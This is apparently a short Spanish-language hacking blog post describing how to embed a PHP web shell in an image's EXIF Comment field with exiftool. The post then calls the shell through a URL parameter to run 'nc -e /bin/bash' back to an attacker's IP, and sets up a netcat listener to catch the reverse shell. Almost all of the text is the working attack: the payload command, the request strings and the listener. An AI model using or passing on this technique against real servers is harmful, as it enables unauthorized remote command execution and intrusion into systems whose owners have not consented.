En esta ocasión voy a realizar algo diferente. Voy a explicar cómo ejecutar una en una máquina objetivo a través de una imagen. Para ello, utilizaremos la herramienta exiftool. Vamos a por ello.
Lo primero que necesitamos es la imagen que vamos a utilizar para cargar la Shell. Una vez descargada, comenzamos a modificarla.
El comando para ello es:
exiftool -Comment='<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ nombre_imagen.extensión
Esto añadiría la Shell como metadata de la imagen.
![](https://elhackeretico.com/wp-content/uploads/2022/11/image.png)
De esta manera podemos ejecutar comandos como CMD. Para ejecutar la Shell debemos cargar la imagen con el comando anterior ya cargado en la Web donde vayamos a ejecutar la reverse y en el buscador ejecutar lo siguiente:
?cmd= nc -e /bin/bash IP PUERTO
URL/directorio/archivo.php.png?cmd= nc –e /bin/bash IP PUERTO
Al mismo tiempo debemos ejecutar en nuestra máquina atacante nc con el mismo puerto indicado en la Shell.
nc –lnvp PUERTO
Y tendríamos conexión reversa con el objetivo.
No responses yet